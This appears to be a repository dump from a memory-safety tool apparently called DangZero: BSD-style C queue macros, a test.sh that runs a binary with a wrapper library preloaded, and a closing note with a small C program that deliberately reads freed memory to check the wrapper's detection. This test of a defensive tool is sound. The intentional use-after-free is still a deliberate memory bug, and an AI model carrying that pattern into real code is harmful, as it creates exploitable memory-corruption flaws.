348 | */ 349 | #define SIMPLEQ_INIT(head) do { \ 350 | (head)->sqh_first = NULL; \ 351 | (head)->sqh_last = &(head)->sqh_first; \ 352 | } while (/*CONSTCOND*/0) 353 | 354 | #define SIMPLEQ_INSERT_HEAD(head, elm, field) do { \ 355 | if (((elm)->field.sqe_next = (head)->sqh_first) == NULL) \ 356 | (head)->sqh_last = &(elm)->field.sqe_next; \ 357 | (head)->sqh_first = (elm); \ 358 | } while (/*CONSTCOND*/0) 359 | 360 | #define SIMPLEQ_INSERT_TAIL(head, elm, field) do { \ 361 | (elm)->field.sqe_next = NULL; \ 362 | *(head)->sqh_last = (elm); \ 363 | (head)->sqh_last = &(elm)->field.sqe_next; \ 364 | } while (/*CONSTCOND*/0) 365 | 366 | #define SIMPLEQ_INSERT_AFTER(head, listelm, elm, field) do { \ 367 | if (((elm)->field.sqe_next = (listelm)->field.sqe_next) == NULL)\ 368 | (head)->sqh_last = &(elm)->field.sqe_next; \ 369 | (listelm)->field.sqe_next = (elm); \ 370 | } while (/*CONSTCOND*/0) 371 | 372 | #define SIMPLEQ_REMOVE_HEAD(head, field) do { \ 373 | if (((head)->sqh_first = (head)->sqh_first->field.sqe_next) == NULL) \ 374 | (head)->sqh_last = &(head)->sqh_first; \ 375 | } while (/*CONSTCOND*/0) 376 | 377 | #define SIMPLEQ_REMOVE_AFTER(head, elm, field) do { \ 378 | if (((elm)->field.sqe_next = (elm)->field.sqe_next->field.sqe_next) \ 379 | == NULL) \ 380 | (head)->sqh_last = &(elm)->field.sqe_next; \ 381 | } while (/*CONSTCOND*/0) 382 | 383 | #define SIMPLEQ_REMOVE(head, elm, type, field) do { \ 384 | if ((head)->sqh_first == (elm)) { \ 385 | SIMPLEQ_REMOVE_HEAD((head), field); \ 386 | } else { \ 387 | struct type *curelm = (head)->sqh_first; \ 388 | while (curelm->field.sqe_next != (elm)) \ 389 | curelm = curelm->field.sqe_next; \ 390 | if ((curelm->field.sqe_next = \ 391 | curelm->field.sqe_next->field.sqe_next) == NULL) \ 392 | (head)->sqh_last = &(curelm)->field.sqe_next; \ 393 | } \ 394 | } while (/*CONSTCOND*/0) 395 | 396 | #define SIMPLEQ_CONCAT(head1, head2) do { \ 397 | if (!SIMPLEQ_EMPTY((head2))) { \ 398 | *(head1)->sqh_last = (head2)->sqh_first; \ 399 | (head1)->sqh_last = (head2)->sqh_last; \ 400 | SIMPLEQ_INIT((head2)); \ 401 | } \ 402 | } while (/*CONSTCOND*/0) 403 | 404 | #define SIMPLEQ_LAST(head, type, field) \ 405 | (SIMPLEQ_EMPTY((head)) ? \ 406 | NULL : \ 407 | ((struct type *)(void *) \ 408 | ((char *)((head)->sqh_last) - offsetof(struct type, field)))) 409 | 410 | /* 411 | * Tail queue definitions. 412 | */ 413 | #define _TAILQ_HEAD(name, type, qual) \ 414 | struct name { \ 415 | qual type *tqh_first; /* first element */ \ 416 | qual type *qual *tqh_last; /* addr of last next element */ \ 417 | } 418 | #define TAILQ_HEAD(name, type) _TAILQ_HEAD(name, struct type,) 419 | 420 | #define TAILQ_HEAD_INITIALIZER(head) \ 421 | { TAILQ_END(head), &(head).tqh_first } 422 | 423 | #define _TAILQ_ENTRY(type, qual) \ 424 | struct { \ 425 | qual type *tqe_next; /* next element */ \ 426 | qual type *qual *tqe_prev; /* address of previous next element */\ 427 | } 428 | #define TAILQ_ENTRY(type) _TAILQ_ENTRY(struct type,) 429 | 430 | /* 431 | * Tail queue access methods. 
432 | */ 433 | #define TAILQ_FIRST(head) ((head)->tqh_first) 434 | #define TAILQ_END(head) (NULL) 435 | #define TAILQ_NEXT(elm, field) ((elm)->field.tqe_next) 436 | #define TAILQ_LAST(head, headname) \ 437 | (*(((struct headname *)((head)->tqh_last))->tqh_last)) 438 | #define TAILQ_PREV(elm, headname, field) \ 439 | (*(((struct headname *)((elm)->field.tqe_prev))->tqh_last)) 440 | #define TAILQ_EMPTY(head) (TAILQ_FIRST(head) == TAILQ_END(head)) 441 | 442 | 443 | #define TAILQ_FOREACH(var, head, field) \ 444 | for ((var) = ((head)->tqh_first); \ 445 | (var) != TAILQ_END(head); \ 446 | (var) = ((var)->field.tqe_next)) 447 | 448 | #define TAILQ_FOREACH_SAFE(var, head, field, next) \ 449 | for ((var) = ((head)->tqh_first); \ 450 | (var) != TAILQ_END(head) && \ 451 | ((next) = TAILQ_NEXT(var, field), 1); (var) = (next)) 452 | 453 | #define TAILQ_FOREACH_REVERSE(var, head, headname, field) \ 454 | for ((var) = (*(((struct headname *)((head)->tqh_last))->tqh_last));\ 455 | (var) != TAILQ_END(head); \ 456 | (var) = (*(((struct headname *)((var)->field.tqe_prev))->tqh_last))) 457 | 458 | #define TAILQ_FOREACH_REVERSE_SAFE(var, head, headname, field, prev) \ 459 | for ((var) = TAILQ_LAST((head), headname); \ 460 | (var) != TAILQ_END(head) && \ 461 | ((prev) = TAILQ_PREV((var), headname, field), 1); (var) = (prev)) 462 | 463 | /* 464 | * Tail queue functions. 465 | */ 466 | #if defined(QUEUEDEBUG) 467 | #define QUEUEDEBUG_TAILQ_INSERT_HEAD(head, elm, field) \ 468 | if ((head)->tqh_first && \ 469 | (head)->tqh_first->field.tqe_prev != &(head)->tqh_first) \ 470 | QUEUEDEBUG_ABORT("TAILQ_INSERT_HEAD %p %s:%d", (head), \ 471 | __FILE__, __LINE__); 472 | #define QUEUEDEBUG_TAILQ_INSERT_TAIL(head, elm, field) \ 473 | if (*(head)->tqh_last != NULL) \ 474 | QUEUEDEBUG_ABORT("TAILQ_INSERT_TAIL %p %s:%d", (head), \ 475 | __FILE__, __LINE__); 476 | #define QUEUEDEBUG_TAILQ_OP(elm, field) \ 477 | if ((elm)->field.tqe_next && \ 478 | (elm)->field.tqe_next->field.tqe_prev != \ 479 | &(elm)->field.tqe_next) \ 480 | QUEUEDEBUG_ABORT("TAILQ_* forw %p %s:%d", (elm), \ 481 | __FILE__, __LINE__); \ 482 | if (*(elm)->field.tqe_prev != (elm)) \ 483 | QUEUEDEBUG_ABORT("TAILQ_* back %p %s:%d", (elm), \ 484 | __FILE__, __LINE__); 485 | #define QUEUEDEBUG_TAILQ_PREREMOVE(head, elm, field) \ 486 | if ((elm)->field.tqe_next == NULL && \ 487 | (head)->tqh_last != &(elm)->field.tqe_next) \ 488 | QUEUEDEBUG_ABORT("TAILQ_PREREMOVE head %p elm %p %s:%d",\ 489 | (head), (elm), __FILE__, __LINE__); 490 | #define QUEUEDEBUG_TAILQ_POSTREMOVE(elm, field) \ 491 | (elm)->field.tqe_next = (void *)1L; \ 492 | (elm)->field.tqe_prev = (void *)1L; 493 | #else 494 | #define QUEUEDEBUG_TAILQ_INSERT_HEAD(head, elm, field) 495 | #define QUEUEDEBUG_TAILQ_INSERT_TAIL(head, elm, field) 496 | #define QUEUEDEBUG_TAILQ_OP(elm, field) 497 | #define QUEUEDEBUG_TAILQ_PREREMOVE(head, elm, field) 498 | #define QUEUEDEBUG_TAILQ_POSTREMOVE(elm, field) 499 | #endif 500 | 501 | #define TAILQ_INIT(head) do { \ 502 | (head)->tqh_first = TAILQ_END(head); \ 503 | (head)->tqh_last = &(head)->tqh_first; \ 504 | } while (/*CONSTCOND*/0) 505 | 506 | #define TAILQ_INSERT_HEAD(head, elm, field) do { \ 507 | QUEUEDEBUG_TAILQ_INSERT_HEAD((head), (elm), field) \ 508 | if (((elm)->field.tqe_next = (head)->tqh_first) != TAILQ_END(head))\ 509 | (head)->tqh_first->field.tqe_prev = \ 510 | &(elm)->field.tqe_next; \ 511 | else \ 512 | (head)->tqh_last = &(elm)->field.tqe_next; \ 513 | (head)->tqh_first = (elm); \ 514 | (elm)->field.tqe_prev = &(head)->tqh_first; \ 515 | } while 
(/*CONSTCOND*/0) 516 | 517 | #define TAILQ_INSERT_TAIL(head, elm, field) do { \ 518 | QUEUEDEBUG_TAILQ_INSERT_TAIL((head), (elm), field) \ 519 | (elm)->field.tqe_next = TAILQ_END(head); \ 520 | (elm)->field.tqe_prev = (head)->tqh_last; \ 521 | *(head)->tqh_last = (elm); \ 522 | (head)->tqh_last = &(elm)->field.tqe_next; \ 523 | } while (/*CONSTCOND*/0) 524 | 525 | #define TAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ 526 | QUEUEDEBUG_TAILQ_OP((listelm), field) \ 527 | if (((elm)->field.tqe_next = (listelm)->field.tqe_next) != \ 528 | TAILQ_END(head)) \ 529 | (elm)->field.tqe_next->field.tqe_prev = \ 530 | &(elm)->field.tqe_next; \ 531 | else \ 532 | (head)->tqh_last = &(elm)->field.tqe_next; \ 533 | (listelm)->field.tqe_next = (elm); \ 534 | (elm)->field.tqe_prev = &(listelm)->field.tqe_next; \ 535 | } while (/*CONSTCOND*/0) 536 | 537 | #define TAILQ_INSERT_BEFORE(listelm, elm, field) do { \ 538 | QUEUEDEBUG_TAILQ_OP((listelm), field) \ 539 | (elm)->field.tqe_prev = (listelm)->field.tqe_prev; \ 540 | (elm)->field.tqe_next = (listelm); \ 541 | *(listelm)->field.tqe_prev = (elm); \ 542 | (listelm)->field.tqe_prev = &(elm)->field.tqe_next; \ 543 | } while (/*CONSTCOND*/0) 544 | 545 | #define TAILQ_REMOVE(head, elm, field) do { \ 546 | QUEUEDEBUG_TAILQ_PREREMOVE((head), (elm), field) \ 547 | QUEUEDEBUG_TAILQ_OP((elm), field) \ 548 | if (((elm)->field.tqe_next) != TAILQ_END(head)) \ 549 | (elm)->field.tqe_next->field.tqe_prev = \ 550 | (elm)->field.tqe_prev; \ 551 | else \ 552 | (head)->tqh_last = (elm)->field.tqe_prev; \ 553 | *(elm)->field.tqe_prev = (elm)->field.tqe_next; \ 554 | QUEUEDEBUG_TAILQ_POSTREMOVE((elm), field); \ 555 | } while (/*CONSTCOND*/0) 556 | 557 | #define TAILQ_REPLACE(head, elm, elm2, field) do { \ 558 | if (((elm2)->field.tqe_next = (elm)->field.tqe_next) != \ 559 | TAILQ_END(head)) \ 560 | (elm2)->field.tqe_next->field.tqe_prev = \ 561 | &(elm2)->field.tqe_next; \ 562 | else \ 563 | (head)->tqh_last = &(elm2)->field.tqe_next; \ 564 | (elm2)->field.tqe_prev = (elm)->field.tqe_prev; \ 565 | *(elm2)->field.tqe_prev = (elm2); \ 566 | QUEUEDEBUG_TAILQ_POSTREMOVE((elm), field); \ 567 | } while (/*CONSTCOND*/0) 568 | 569 | #define TAILQ_CONCAT(head1, head2, field) do { \ 570 | if (!TAILQ_EMPTY(head2)) { \ 571 | *(head1)->tqh_last = (head2)->tqh_first; \ 572 | (head2)->tqh_first->field.tqe_prev = (head1)->tqh_last; \ 573 | (head1)->tqh_last = (head2)->tqh_last; \ 574 | TAILQ_INIT((head2)); \ 575 | } \ 576 | } while (/*CONSTCOND*/0) 577 | 578 | /* 579 | * Singly-linked Tail queue declarations. 580 | */ 581 | #define STAILQ_HEAD(name, type) \ 582 | struct name { \ 583 | struct type *stqh_first; /* first element */ \ 584 | struct type **stqh_last; /* addr of last next element */ \ 585 | } 586 | 587 | #define STAILQ_HEAD_INITIALIZER(head) \ 588 | { NULL, &(head).stqh_first } 589 | 590 | #define STAILQ_ENTRY(type) \ 591 | struct { \ 592 | struct type *stqe_next; /* next element */ \ 593 | } 594 | 595 | /* 596 | * Singly-linked Tail queue access methods. 597 | */ 598 | #define STAILQ_FIRST(head) ((head)->stqh_first) 599 | #define STAILQ_END(head) NULL 600 | #define STAILQ_NEXT(elm, field) ((elm)->field.stqe_next) 601 | #define STAILQ_EMPTY(head) (STAILQ_FIRST(head) == STAILQ_END(head)) 602 | 603 | /* 604 | * Singly-linked Tail queue functions. 
605 | */ 606 | #define STAILQ_INIT(head) do { \ 607 | (head)->stqh_first = NULL; \ 608 | (head)->stqh_last = &(head)->stqh_first; \ 609 | } while (/*CONSTCOND*/0) 610 | 611 | #define STAILQ_INSERT_HEAD(head, elm, field) do { \ 612 | if (((elm)->field.stqe_next = (head)->stqh_first) == NULL) \ 613 | (head)->stqh_last = &(elm)->field.stqe_next; \ 614 | (head)->stqh_first = (elm); \ 615 | } while (/*CONSTCOND*/0) 616 | 617 | #define STAILQ_INSERT_TAIL(head, elm, field) do { \ 618 | (elm)->field.stqe_next = NULL; \ 619 | *(head)->stqh_last = (elm); \ 620 | (head)->stqh_last = &(elm)->field.stqe_next; \ 621 | } while (/*CONSTCOND*/0) 622 | 623 | #define STAILQ_INSERT_AFTER(head, listelm, elm, field) do { \ 624 | if (((elm)->field.stqe_next = (listelm)->field.stqe_next) == NULL)\ 625 | (head)->stqh_last = &(elm)->field.stqe_next; \ 626 | (listelm)->field.stqe_next = (elm); \ 627 | } while (/*CONSTCOND*/0) 628 | 629 | #define STAILQ_REMOVE_HEAD(head, field) do { \ 630 | if (((head)->stqh_first = (head)->stqh_first->field.stqe_next) == NULL) \ 631 | (head)->stqh_last = &(head)->stqh_first; \ 632 | } while (/*CONSTCOND*/0) 633 | 634 | #define STAILQ_REMOVE(head, elm, type, field) do { \ 635 | if ((head)->stqh_first == (elm)) { \ 636 | STAILQ_REMOVE_HEAD((head), field); \ 637 | } else { \ 638 | struct type *curelm = (head)->stqh_first; \ 639 | while (curelm->field.stqe_next != (elm)) \ 640 | curelm = curelm->field.stqe_next; \ 641 | if ((curelm->field.stqe_next = \ 642 | curelm->field.stqe_next->field.stqe_next) == NULL) \ 643 | (head)->stqh_last = &(curelm)->field.stqe_next; \ 644 | } \ 645 | } while (/*CONSTCOND*/0) 646 | 647 | #define STAILQ_FOREACH(var, head, field) \ 648 | for ((var) = ((head)->stqh_first); \ 649 | (var); \ 650 | (var) = ((var)->field.stqe_next)) 651 | 652 | #define STAILQ_FOREACH_SAFE(var, head, field, tvar) \ 653 | for ((var) = STAILQ_FIRST((head)); \ 654 | (var) && ((tvar) = STAILQ_NEXT((var), field), 1); \ 655 | (var) = (tvar)) 656 | 657 | #define STAILQ_CONCAT(head1, head2) do { \ 658 | if (!STAILQ_EMPTY((head2))) { \ 659 | *(head1)->stqh_last = (head2)->stqh_first; \ 660 | (head1)->stqh_last = (head2)->stqh_last; \ 661 | STAILQ_INIT((head2)); \ 662 | } \ 663 | } while (/*CONSTCOND*/0) 664 | 665 | #define STAILQ_LAST(head, type, field) \ 666 | (STAILQ_EMPTY((head)) ? \ 667 | NULL : \ 668 | ((struct type *)(void *) \ 669 | ((char *)((head)->stqh_last) - offsetof(struct type, field)))) 670 | 671 | #endif /* !_BMK_CORE_QUEUE_H_ */ 672 | -------------------------------------------------------------------------------- /test.sh: -------------------------------------------------------------------------------- 1 | gcc hello.c -o hello 2 | gcc -fPIC -shared -pthread -O2 -o wrap.so dz.c gc.c -ldl 3 | /bin/cp hello /trusted/consume 4 | /bin/cp wrap.so /trusted/wrap.so 5 | LD_PRELOAD=/trusted/wrap.so /trusted/consume 6 | --------------------------------------------------------------------------------
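
A note on `test.sh`: it builds the wrapper (`wrap.so` from `dz.c` and `gc.c`), copies it together with the `hello` binary into `/trusted`, and runs the binary with the wrapper preloaded. As an extra sanity check, the wrapper can also be preloaded into a small use-after-free program. The sketch below is only illustrative and not part of the repository: the file name `uaf.c` is arbitrary, and the assumption is that under DangZero the dangling access is caught (e.g., via a fault/report) instead of silently reusing the freed memory.

```c
/* uaf.c -- minimal use-after-free trigger (illustrative sketch, not part of the repo) */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(void)
{
    char *p = malloc(32);
    strcpy(p, "hello");
    free(p);                /* p is now dangling */
    printf("%s\n", p);      /* use-after-free: expected to be flagged when run under the wrapper */
    return 0;
}
```

Compile it with `gcc uaf.c -o uaf`, copy the binary into `/trusted`, and run it with `LD_PRELOAD=/trusted/wrap.so /trusted/uaf`, mirroring how `test.sh` runs `/trusted/consume`.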